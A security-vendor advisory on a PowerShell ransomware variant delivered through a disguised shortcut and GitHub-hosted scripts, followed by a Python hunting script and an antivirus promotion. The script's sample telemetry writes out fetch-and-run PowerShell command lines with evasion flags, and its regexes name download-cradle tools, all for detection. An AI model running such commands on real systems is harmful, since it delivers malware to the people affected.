PowerShell Ransomware Attack

The SonicWall Capture Labs threat research team has identified a new PowerShell-based ransomware variant that uses GitHub for distribution. The malware hosts its components, including an executable named decryptor.exe, on the raw.githubusercontent[.]com domain, GitHub's raw-file hosting endpoint, so its downloads arrive over HTTPS from a legitimate domain that many networks allow through.


The ransomware is initially delivered as an archive containing a malicious LNK (Windows shortcut) file, most likely sent as an email attachment. The shortcut is disguised as a Notepad text document, but its target is powershell.exe with arguments that fetch and execute a PowerShell script hosted on GitHub; that script holds the ransomware's core functionality.

The script enumerates the user's Desktop, Downloads, and Documents folders and encrypts their contents with a randomly generated AES key. That AES key is then encrypted with an RSA public key embedded in the script, so it can only be recovered with the attacker's matching private key; nothing left on the victim machine can undo the encryption. The script skips file types the operating system depends on, to avoid destabilizing Windows, and appends the .ENCRYPT extension to each encrypted file.


After encryption, the ransomware downloads decryptor.exe from GitHub and drops a decoy text file to distract the user. For persistence it registers a scheduled task that re-runs the PowerShell script until decryptor.exe has been dropped.

Victims receive a ransom note demanding $500 in Monero (XMR) for the decryption key. Paying is not recommended: there is no guarantee that a working key will be delivered. This threat is detected by SonicWall Capture ATP with RTDMI™.
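The chain described above (a shortcut launching powershell.exe, a download cradle pointed at raw.githubusercontent.com, .ENCRYPT files appearing under the user's folders, scheduled-task persistence, and the decryptor.exe download) can be turned into endpoint hunting rules. The Python below is an added example, not code from the SonicWall report or from NPAV. It runs offline over constructed, simplified Sysmon-style records; the field names, the burst threshold, the paths and the GitHub account/repository strings are assumptions for illustration, not indicators published in the report.

```python
"""Hunting rules for the LNK -> PowerShell -> raw.githubusercontent.com ransomware chain.

Added example, not code from the SonicWall report or the NPAV page. Runs offline over
constructed telemetry (made up here) in a simplified Sysmon-style shape: process
creation, file create/rename and scheduled-task registration. Field names, threshold,
paths and the GitHub account/repo strings are assumptions, not published indicators.
"""
import re
from typing import Dict, List

# Indicators the article does state: GitHub raw hosting, an LNK that launches
# powershell.exe, the .ENCRYPT extension, user folders, and a scheduled task.
RAW_GITHUB = re.compile(r"raw\.githubusercontent\.com", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile|"
    r"Invoke-Expression|\biex\b|Start-BitsTransfer", re.I)
SUSPICIOUS_FLAGS = re.compile(
    r"-(ep|ExecutionPolicy)\s+bypass|-(w|WindowStyle)\s+hidden|-(enc|EncodedCommand)\b", re.I)
LNK_DISGUISE = re.compile(r"\.(txt|docx?|pdf|xlsx?)\.lnk$", re.I)
ENCRYPT_EXT = re.compile(r"\.ENCRYPT$", re.I)
USER_DIRS = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|Documents)\\", re.I)
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)

ENCRYPT_BURST = 3  # assumed threshold: this many .ENCRYPT writes by one process = mass encryption


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per matched rule. Events are processed in order, so the
    burst rule fires exactly once, when a process crosses ENCRYPT_BURST writes."""
    findings: List[Dict[str, object]] = []
    encrypt_writes: Dict[str, int] = {}

    def flag(rule: str, idx: int, why: str) -> None:
        findings.append({"rule": rule, "event": idx, "why": why})

    for idx, ev in enumerate(events):
        kind = ev.get("type")
        if kind == "process" and POWERSHELL.search(ev.get("image", "")):
            cmd = ev.get("cmdline", "")
            # Delivery and final stage: script or decryptor.exe pulled from GitHub raw.
            if RAW_GITHUB.search(cmd) and DOWNLOAD_CRADLE.search(cmd):
                flag("PS-GITHUB-RAW", idx,
                     "PowerShell download cradle pointed at raw.githubusercontent.com")
            # Delivery: the shortcut that started PowerShell (assumed 'origin' field).
            origin = ev.get("origin", "")
            if origin.lower().endswith(".lnk"):
                why = "powershell.exe launched from a .lnk shortcut"
                if LNK_DISGUISE.search(origin):
                    why += " disguised with a document double extension"
                flag("LNK-TO-PS", idx, why)
        elif kind in ("file_create", "file_rename"):
            # Encryption: .ENCRYPT files appearing under Desktop/Downloads/Documents.
            path = ev.get("path", "")
            if ENCRYPT_EXT.search(path) and USER_DIRS.search(path):
                proc = ev.get("image", "<unknown>")
                encrypt_writes[proc] = encrypt_writes.get(proc, 0) + 1
                if encrypt_writes[proc] == ENCRYPT_BURST:
                    flag("ENCRYPT-BURST", idx,
                         f"{proc} wrote {ENCRYPT_BURST} .ENCRYPT files in user folders")
        elif kind == "sched_task":
            # Persistence: a task that re-runs PowerShell with evasion flags or a cradle.
            action = ev.get("action", "")
            if POWERSHELL.search(action) and (
                    SUSPICIOUS_FLAGS.search(action) or DOWNLOAD_CRADLE.search(action)):
                flag("TASK-PS-PERSIST", idx,
                     f"scheduled task {ev.get('task', '?')} runs PowerShell: {action[:60]}")
    return findings


def chain_coverage(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct rules that fired, in first-seen order, so an analyst can see how much of
    the delivery -> encryption -> persistence -> decryptor chain was observed."""
    seen: List[str] = []
    for f in findings:
        if f["rule"] not in seen:
            seen.append(str(f["rule"]))
    return seen


# Constructed sample telemetry (made up; user name, paths, account and repo are placeholders).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "explorer.exe", "origin": "C:\\Users\\alice\\Downloads\\invoice\\Notes.txt.lnk",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (iwr "
                "https://raw.githubusercontent.com/example-acct/example-repo/main/stage.ps1)\""},
    {"type": "file_rename", "image": "powershell.exe",
     "path": "C:\\Users\\alice\\Documents\\budget.xlsx.ENCRYPT"},
    {"type": "file_rename", "image": "powershell.exe",
     "path": "C:\\Users\\alice\\Desktop\\thesis.docx.ENCRYPT"},
    {"type": "file_rename", "image": "powershell.exe",
     "path": "C:\\Users\\alice\\Downloads\\photo.jpg.ENCRYPT"},
    {"type": "sched_task", "task": "\\Microsoft\\Windows\\UpdateCheck",
     "action": "powershell.exe -w hidden -ep bypass -f C:\\Users\\alice\\AppData\\Roaming\\stage.ps1"},
    {"type": "process", "image": "powershell.exe", "parent": "powershell.exe",
     "cmdline": "iwr https://raw.githubusercontent.com/example-acct/example-repo/main/decryptor.exe "
                "-OutFile C:\\Users\\alice\\Desktop\\decryptor.exe"},
    # Benign noise: an admin running a one-liner; must not fire.
    {"type": "process", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -c Get-Date"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['rule']}] event {f['event']}: {f['why']}")
    print("chain coverage:", chain_coverage(hunt(SAMPLE_EVENTS)))
```

On real telemetry the three record types map to Sysmon Event ID 1 (process creation, with the parent image and command line), Sysmon Event ID 11 (file create) and Windows Security Event ID 4698 (scheduled task created); PowerShell script block logging (Event ID 4104) will also capture the downloaded script body, which is where the RSA public key and the .ENCRYPT logic would be visible. The burst threshold is the part to tune: a single .ENCRYPT write is noise, a run of them from one powershell.exe in the user's folders is the encryption stage in progress.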


"NPAV recommends that home users and organizations maintain strong, up-to-date cybersecurity measures. Install NPAV on your desktop, laptop, and mobile devices to ensure world-class protection against fraud, malware, and ransomware attacks.

Choose NPAV and be a part of our mission to make the digital world safer for everyone."